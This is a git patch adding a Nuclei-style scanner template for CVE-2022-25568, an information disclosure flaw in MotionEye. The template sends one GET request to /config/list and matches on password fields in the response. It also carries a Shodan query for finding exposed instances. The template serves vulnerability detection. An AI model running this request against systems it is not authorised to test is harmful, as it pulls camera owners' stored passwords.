From c97b868a5d7dcf0eb7f0db9d9cb831782bea0ec4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 11 Oct 2023 02:31:40 +0530 Subject: [PATCH] Create CVE-2022-25568.yaml --- http/cves/2022/CVE-2022-25568.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2022/CVE-2022-25568.yaml diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml new file mode 100644 index 0000000000..a3a02f8226 --- /dev/null +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-25568 + +info: + name: MotionEye Config Info Disclosure + author: DhiyaneshDK + severity: high + description: | + MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured. + reference: + - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/ + - https://github.com/ccrisan/motioneye/issues/2292 + - https://nvd.nist.gov/vuln/detail/cve-2022-25568 + metadata: + max-request: 1 + verified: true + shodan-query: html:"MotionEye" + tags: cve,cve2023,motioneye,config + +http: + - method: GET + path: + - "{{BaseURL}}/config/list" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "upload_password" + - "network_password" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200